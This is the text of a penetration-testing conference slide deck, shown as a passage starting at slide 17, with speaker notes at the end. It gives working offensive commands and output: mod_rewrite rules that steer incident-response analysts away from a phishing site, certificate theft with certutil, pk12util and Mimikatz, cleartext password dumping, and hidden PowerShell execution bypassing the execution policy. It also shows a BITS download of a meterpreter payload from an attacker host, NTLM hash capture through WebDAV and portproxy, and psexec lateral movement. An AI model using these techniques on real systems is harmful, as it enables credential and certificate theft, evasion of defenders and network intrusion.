  • 17. More LinkedIn • Import them! • Need them in a specific format though. – Ruby to the rescue
  • 19. More LinkedIn • Get some contacts
  • 20. More LinkedIn • Import and do your thing
  • 21. The setup… IR teams F**k up all my hard work preparing phishing attacks
  • 22. Phishing and F**king with IR Teams • Thanks to people like SANS organizations have a standardized, repeatable, process  – What’s not to like? – Submit to the sandbox – Submit to the malware lookup site – I feel safe! • But, sure does suck when you spend all that time setting up a phish only to have it ruined by this well tuned, standardized process…
  • 23. Phishing and F**king with IR Teams • What you *could* do… – Build a phish that EVERYONE will report – Capture the IR process via log/scan/analyst activity • This gives you intel on: – Which services are contracted out for analysis • And their IPs – Are humans in the mix • And their IPs – Level of sophistication
  • 24. Phishing and F**king with IR Teams • Once you know who’s coming to do analysis, we can send them to an alternate site and keep the users going to the phish site. • How?
  • 25. Phishing and F**king with IR Teams • Apache and mod-rewrite is an option RewriteEngine On RewriteCond %{HTTP_USER_AGENT} ^$ [OR] RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*(HTTrack|clshttp|archiver|load er|email|nikto|miner|python|wget|Wget).* [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|libwww- perl|curl|libcurl|harvest|scan|grab|extract).* [NC,OR] RewriteCond %{REMOTE_ADDR} ^188.168.16.164$ [OR] #outside IR RewriteCond %{REMOTE_ADDR} ^66.249.73.136$ [OR] #googlebot RewriteCond %{REMOTE_ADDR} ^88.88. [OR] RewriteRule ^(/.*) http://www.totallysafesite.com/$1 [R,L]
  • 26. The setup… I want to find and steal code signing certificates from victims
  • 27. Stealing Certificates • Why? • Have you tried to get/buy one? It’s a pain in the ass. – I see why people just steal them • Impact – Sign code as the company – Now your code may be *more* trusted by the victim…or at least less suspicious – Can you steal their wildcard SSL cert?
  • 28. Stealing Certificates • If you export one, it has to have a password  • However, if YOU export it, YOU can set the password. • You can do this all on the command line – Use mozilla’s certutil • http://www.mozilla.org/projects/security/pki/nss/tools /certutil.html – Use Mimikatz 
  • 29. Stealing Certificates • Mozilla certutil • Compile your own, or download precompiled bins certutil.exe -L -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.def ault-1339854577637 VeriSign Class 3 Extended Validation SSL CA ,, DigiCert High Assurance CA-3 ,, VeriSign Class 3 International Server CA - G3 ,, COMODO Extended Validation Secure Server CA 2 ,, Verified Publisher LLC's COMODO CA Limited ID u,u,u <------- code signer Akamai Subordinate CA 3 ,, VeriSign, Inc. ,, --snip--
  • 30. Stealing Certificates • Mozilla certutil • -L List all the certificates, or display information about a named certificate, in a certificate database. certutil.exe -L -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.defaul t-1339854577637 VeriSign Class 3 Extended Validation SSL CA ,, DigiCert High Assurance CA-3 ,, VeriSign Class 3 International Server CA - G3 ,, COMODO Extended Validation Secure Server CA 2 ,, Verified Publisher LLC's COMODO CA Limited ID u,u,u Akamai Subordinate CA 3 ,, VeriSign, Inc. ,, --snip • “u”  Certificate can be used for authentication or signing  • http://www.mozilla.org/projects/security/pki/nss/tools/certutil.html
  • 31. Stealing Certificates • Mozilla pk12util.exe • To extract the cert: C:UsersCGDownloadsnss-3.10nss-3.10bin>pk12util.exe - n "Verified Publisher LLC's COMODO CA Limited ID" -d C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdh wru.default-1339854577637 -o test2.p12 -W mypassword1 • http://www.mozilla.org/projects/security/pki/nss/tools/pk12util.html
  • 32. Stealing Certificates Via MimiKatz (list certs) execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit‘ Process 3472 created. Channel 12 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My - sqlapps01 Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 mimikatz(commandline) # exit
  • 33. Stealing Certificates Via MimiKatz (export certs) execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit' Process 6112 created. Channel 23 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My - sqlapps01 Container Clé : SELFSSL Provider : Microsoft RSA SChannel Cryptographic Provider Type : AT_KEYEXCHANGE Exportabilité : OUI Taille clé : 1024 Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.pfx' : OK Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.der' : OK mimikatz(commandline) # exit
  • 34. The setup… Mimikatz is awesome and I want to execute it without putting bins on the box
  • 35. Mimikatz gives me clear text passwords?
  • 37. Mimikatz • Mimikatz detected by AV • Sekurlsa.dll detected by AV • WCE detected by AV • WCE IN MEMORY! (kinda) Stop submitting $#!+ to Virus Total!
  • 38. Mimikatz • New version (6 Sep 12) supports in-memory • execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
  • 39.
  • 40.
  • 41. The setup… Incognito is awesome and I want to show/leverage the new features
  • 42. New Incognito (find_token) C:>find_token.exe usage: find_token.exe <server_name_or_ip> | -f <server_list_file> [username] [password]
  • 43. New Incognito (find_token) C:>find_token.exe dc1 [*] Scanning for logged on users... Server Name Username ------------------------------------------------------ dc1 PROJECTMENTORjdoe dc1 PROJECTMENTORjdoe
  • 45. Release of NETVIEW C:Documents and SettingsuserDesktop>netview Netviewer Help -------------------------------------------------------------------- -d domain : Specifies a domain to pull a list of hosts from uses current domain if none specified -f filename.txt : Speficies a file to pull a list of hosts from -o filename.txt : Out to file instead of STDOUT
  • 46. Release of NETVIEW C:Documents and SettingsuserDesktop>netview -d [+] Host: WIN7X64 [*] -d used without domain specifed - using current domain [+] Number of hosts: 3 Enumerating AD Info [+] WIN7X64 - Comment - [+] Host: DC1 [+] WIN7X64 - OS Version - 6.1 Enumerating AD Info Enumerating IP Info [+] DC1 - Comment - [+] WIN7X64 - IPv4 Address - 172.16.10.216 [+] DC1 - OS Version - 6.1 [+] DC1 - Domain Controller Enumerating Share Info Enumerating IP Info [+] WIN7X64 - Share - ADMIN$ Remote Admin [+] DC1 - IPv4 Address - 172.16.10.10 [+] WIN7X64 - Share - C$ Default share [+] WIN7X64 - Share - IPC$ Remote IPC Enumerating Share Info [+] DC1 - Share - ADMIN$ Remote Admin [+] DC1 - Share - C$ Default share Enumerating Session Info [+] DC1 - Share - IPC$ Remote IPC [+] WIN7X64 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0 [+] DC1 - Share - NETLOGON Logon server share [+] DC1 - Share - SYSVOL Logon server share Enumerating Logged-on Users Enumerating Session Info [+] DC1 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0 Enumerating Logged-on Users [+] DC1 - Logged-on - PROJECTMENTORjdoe [+] DC1 - Logged-on - PROJECTMENTORjdoe
  • 47. Release of NETVIEW AND IT’S ALREADY ON GITHUB:
  • 48. The setup… Dropping binaries is a necessity sometimes, persistence for instance, but unless you name your bin SVCHOST.exe you don’t want it looking like:
  • 49. this:
  • 51. He does something really well…
  • 52. And it’s not just the icon…
  • 53. Yes, it’s already on Github too
  • 54. The setup… Who doesn’t want more ways to psexec??!!!
  • 55. 10 ways to PSEXEC
  • 56. Sysinternal PSEXEC POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Leaves PSEXESVC • Executes binary as user running specified, not as • Have to touch disk if not SYSTEM, so no Proxy present already concerns
  • 57. Metasploit PSEXEC POSITIVES NEGATIVES • Supports the use of • Some AVs flag service Hashes binary due to injection techniques used within • Rundll32.exe is running
  • 58. Metasploit PSEXEC-MOF POSITIVES NEGATIVES • Drop a file and • XP and below Windows automatically – (only because Metasploit runs it. (MAGIC!) doesn’t automatically compile MOFs) • ADMIN$ required – (Unless you make code edits)
  • 59. Metasploit PSEXEC-As-User POSITIVES NEGATIVES • Executes as the current • Some AVs flag service user binary due to injection • No need for passwords techniques used within or hashes • Rundll32.exe is running • Also a great way to bypass UAC.. But more on that later
  • 60. WMI POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
  • 61. Powershell POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
  • 62. RemCom POSITIVES NEGATIVES • Open source psexec • Binary, so again, can’t • You can add Pass-The- go over Metasploit Hash sessions directly – (open source an all) – portfwd Fu can still be used on a single IP • Runs as SYSTEM
  • 63. Winexe POSITIVES NEGATIVES • Open source psexec • Binary, so again, can’t • Supports Pass-The-Hash go over Metasploit sessions directly – portfwd Fu can still be used on a single IP • Runs as SYSTEM
  • 64. smbexec POSITIVES NEGATIVES • Open source psexec • Binary • Supports Pass-The-Hash – (but designed with shoveling over Metasploit in mind) http://sourceforge.net/projects/smbexec/
  • 65. Pass the hash for 15 years stuff here • Firefox • smbclient • smbmount • Rpcclient • http://passing-the-hash.blogspot.com/
  • 66. Zfasel’s stuff here • If it ever gets released works ;-) LOVE YOU FASEL!! Go see his talk, it works now… maybe…
  • 67. Python && impacket • http://code.google.com/p/impacket/ • PTH support for SMB/MSSQL/
  • 68. WinRM (‘new’ hotness) POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns
  • 69. Do you look for 5985 internally on your pen tests? we would suggest it ;-) src: http://3.bp.blogspot.com/_nldKmk1qZaA/S2ahpNBS1BI/AAAAAAAAAy8/XrOxvP8B93M/s1600/winrm6.png
  • 70. Victim: winrm quickconfig –q Attacker: winrm quickconfig -q winrm set winrm/config/client @{AllowUnencrypted=“true”;TrustedHosts=“192.168.1.101”} Yes.. That’s right, THE ATTACKER says which hosts to trust… Sooooo much fun to be had! Oh, and did I mention it’s completely interactive? (You can enter password questions)
  • 71. Metasploit PSEXEC-WinRM POSITIVES NEGATIVES • Never going to be on • Need a Password any AV list • Executes binary as user specified, not as SYSTEM, so no Proxy concerns DISCLAIMER: CURRENTLY VAPORWARE!! but…
  • 72. Build your own pyBear • PySMB supports auth with using hashes • Thanks Rel1k for the heads up on the library – but I’m not a good enough coder to get it working • Compile your own psexec with hash support • ;-) • Impacket (again)
  • 73. Build your own Bear.rb • Metasploit’s Rex library – already has the hash passing goodness – HDM committed a stand-alone version of PSEXEC on September 5th 2012
  • 74. The setup… UAC sucks… bypassing only takes 2 things…
  • 75. The setup… If you’re an admin and UAC is stopping you…
  • 76. Find a network with more than one Windows box…
  • 77. The setup… Why doesn’t SYSTEM have proxy settings !?!
  • 78. • If OS !> Vista – SMB/UPLOAD_FILE BITSADMIN 2.0 (32bit) • WINDOWS/EXEC (or any of the other psexec methods we just talked about) – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM AUTOSCRIPT http://wpad/wpad.dat “;” (or PAC) – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM /MANUAL_PROXY 192.168.5.100:3128 “;” – After your done use NO_PROXY in place of AUTOSCRIPT or MANUAL_PROXY • Then MSF-PSEXEC to your heart’s content, SYSTEM will now use the proxy you’ve set.
  • 79. NETSH & ProxyCFG • Sets the WinHTTP proxy – Not Windows’ proxy settings, only is used if the program uses WinHTTP • XP – proxycfg –p 192.168.92.100:3128 – or – proxycfg –u (pulls it from IE) • Vista+ – netsh winhttp set proxy 192.168.92.100:3128 – or – netsh winhttp import proxy ie
  • 80. REGISTRY Poking • HKLMSoftwarePoliciesMicrosoftWindows CurrentVersionInternet Settings • ProxySettingsPerUser [DWORD] • Set to 0 for settings are System Wide • Set to 1 for settgings are Per User
  • 81. The setup… Neat binaries that do backdoor/RAT behavior that are already there for us.
  • 82. Windows is my backdoor BITS “BITS is a file transfer service that provides a scriptable interface through Windows PowerShell. BITS transfers files asynchronously in the foreground or in the background. And, it automatically resumes file transfers after network disconnections and after a computer is restarted.” http://technet.microsoft.com/en-us/library/dd819415.aspx
  • 83. Windows is my backdoor BITS There are three types of BITS transfer jobs: - A download job downloads files to the client computer. - An upload job uploads a file to the server. - An upload-reply job uploads a file to the server and receives a reply file from the server application.
  • 84. Windows is my backdoor BITS (How-To) • Set the server side up (HTTP, not standard setup) – Google • Uses powershell to upload/download import BITS PS C:Userscg>Import-Module BitsTransfer Download files over BITS PS C:Userscg> Start-BitsTransfer http://192.168.26.128/upload/meterp443.exe C:UserscgDesktopmeterpdownload443.exe
  • 85. Windows is my backdoor BITS (How-To) Upload files over BITS PS C:Userscg> Start-BitsTransfer -Source C:UserscgDesktopfile2upload.txt -Destination http://192.168.26.128/upload/myfile.txt -transfertype upload
  • 86. Windows is my backdoor BITS over Wireshark
  • 87. Windows is my backdoor • Powershell • OMG Powershell!
  • 88. Windows is my backdoor • Powershell
  • 89. Windows is my backdoor • PowerShell – Does A LOT! – Check out Exploit Monday and PowerSploit – Carlos Perez has had lots of PowerShell blog posts – I haven't found a meterpreter feature that cant be done with PowerShell
  • 90. Windows is my backdoor • Powershell cool examples – Powershell hashdump (in SET) – Poweshell exec method in MSSQL_Payload – PowerSploit (syringe dll inject/shellcode exec ala PowerShell)
  • 91. Windows is my backdoor • Powershell cool examples • Port Scanner: PS C:> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.14",$_)) "$_ is open" } 2>$null 25 is open • From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
  • 92. Windows is my backdoor • Powershell cool examples • Port Sweeper PS C:> 1..255 | % { echo ((new-object Net.Sockets.TcpClient) .Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null 10.1.1.5 • From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
  • 93. Windows is my backdoor • Powershell cool examples • Bypass execution policy – Dave Kennedy talked about this at defcon 18 – Requires PowerShell v2.0 or above – powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -WindowStyle Hidden - File "C:do_neat_ps_shit.ps1"
  • 94. Windows is my backdoor • CreateCMD stuff from Dave Kennedy • In SET • Pshexec by Carlos Perez • https://github.com/darkoperator/Meterpreter-Scripts/blob/master/scripts/meterpreter/pshexec.rb • B64 encodes the command so you can pass via meterp or in another script • powershell -noexit –EncodedCommand [b64enc BLOB]
  • 95. Windows is my backdoor • Metasploit to generate PowerShell • Uses old powersploit technique
  • 96. Windows is my backdoor • How to run PowerShell from Meterpreter – Use a bat file C:>type run_ps.bat powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -WindowStyle Hidden -File C:ipinfo2.ps1 Example: meterpreter > execute -H -f cmd.exe -a '/c C:runps.bat' Process 28536 created. meterpreter > [*] 4.5.6.21:3863 Request received for /vLNL... [*] 4.5.6.21:3863 Staging connection for target /vLNL received... --snip-- [*] Patched Communication Timeout at offset 653608... [*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
  • 97. The setup… A webdav server to download files from. Why? Because we can.
  • 99. MSF WebDAV server • net use ipdocuments /User:Guest • copy ipdocumentsmyexe.exe myexe.exe • Available on github: • https://github.com/carnal0wnage/Metasploit- Code/blob/master/modules/exploits/webdav_file_server.rb
  • 100. MSF WebDAV server msf exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe) [*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe [*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe) [*] 192.168.26.1:17870 PROPFIND /documents [*] 192.168.26.1:17870 PROPFIND => 301 (/documents) [*] 192.168.26.1:17870 PROPFIND /documents/ [*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/) [*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory [*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]
  • 101. The Setup… LAN based attacks are instant wins on internal pentests, but difficult if not impossible to do on externals… or are they…
  • 102. While we are on the subject… Does anyone know what happens when you try to access a share on a windows box that doesn’t exist from another windows box?? I want to access SHARE3 I don’t have SHARE3 Is that it?
  • 103. nope (if webclient service is started – Vista+ manual start) I want to access SHARE3 I don’t have SHARE3 on SMB I want to access SHARE3 over WebDAV If you are following along at home, windows is always (unless disabled) listening on Port 445 (SMB) so an attacker can’t override it, but rarely have anything listening on port 80
  • 104. On-target NBNS Spoofing FakeNetbiosNS FTW!
  • 105. Meet the Microsoft Windows Firewall “PORTPROXY” feature Basically it’s port-forwarding but can do so for: IPv4 -> IPv4 IPv6 -> IPv4 IPv6 -> IPv6 IPv4 -> IPv6 In XP, if you set up a PORTPROXY, it doesn’t show up in “NETSTAT” or TCPview ;-)
  • 106. Now convince/cause someone to connect to a fake share on VICTIM1…
  • 107. weeeeeeeeeeeeee • *] 50.50.50.50 http_ntlm - Request '/share3/test.png'... • [*] 50.50.50.50 http_ntlm - 2012-01-10 04:22:25 +0000 • NTLMv2 Response Captured from WIN7X86 • DOMAIN: PROJECTMENTOR USER: jadmin • LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled • NTHASH:9eed2162b1c7424780204fb9ced5bc1a NT_CLIENT_CHALLENGE:0101000000000000067a01b4 b097cd01c77c09ccedbfc55d0000000002001a0070007 2006f006a006500630074006d0065006e0074006f0072 000000000000000000
  • 108. why 1. Give me SHARE3! 5. OK, you are in my Intranet, AUTHAUTH 4. AUTH! via portpoxy 3. AUTH! And yes, SMB_Relay works 7. kthxbai! just fine if you have a route set up over your 2. Portproxy! meterpreter shell of the 6. AUTOAUTH! connect back. Oh, did I mention cross-protocol means you can go to the same host?! ;-)
  • 109. Respectfully refrained from any Inside->Out Google images. You’re welcome.
  • 110. The setup… Are DNS Payloads useful? Let’s talk about our public options
  • 111. DNS Payloads • Quick talk on currently available DNS payloads • What’s available? – CANVAS DNS Mosdef – DNS Cat (skull security) – Metasploit DNS Payloads
  • 112. DNS Payloads • Canvas DNS Mosdef – Uses DNS TXT Records • So its UDP and correctly formed? – BUT • Directly connects to the host • Uses TXT records, – I’ve never pentested someone *good* that allowed this
  • 113. DNS Payloads • Canvas DNS Mosdef
  • 114. DNS Payloads • DNSCat (Skullsecurity) – http://www.skullsecurity.org/wiki/index.php/Dnscat – Uses recursive DNS requests • So its UDP and correctly formed? – Has a metasploit payload, so can make a msf dnscat binary to run and get shell – Same as dnscat –d domain –exec “cmd.exe” – BUT • But does recursive DNS requests • Never worked for me IRL
  • 115. DNS Payloads • DNSCat (Skullsecurity)
  • 116. DNS Payloads • DNSCat (java version) – http://tadek.pietraszek.org/projects/DNScat/ – Comes as java libs – Requires PPP to tunnel anything useful • *nix only?
  • 117. DNS Payloads • DNSCat (java version)
  • 118. DNS Payloads • Metasploit DNS – Currently there are no full DNS payloads • Aside from skullsecurity dnscat payload (not in trunk) – There are several payloads that will got fetch ANOTHER payload and exec it for you via DNS • dns_txt_query_exec.rb • dns_query_exec.rb • https://github.com/rapid7/metasploit- framework/pull/173 – Something in the works: http://dev.metasploit.com/redmine/issues/444#note-9
  • 119. DNS Payloads • Bottom Line – Nothing public that’s usable ATM

Editor's Notes

  1. Just talk the past work piece
  2. LinkedIN Open Networkers
  3. Phizer
  4. Phizer
  5. Maybe I don’t automate enough?
  6. You can play space invaders on it, how much else do you need!?
  7. And by a lot, I mean a lot …holy shit
  8. You can play space invaders on it, how much else do you need!?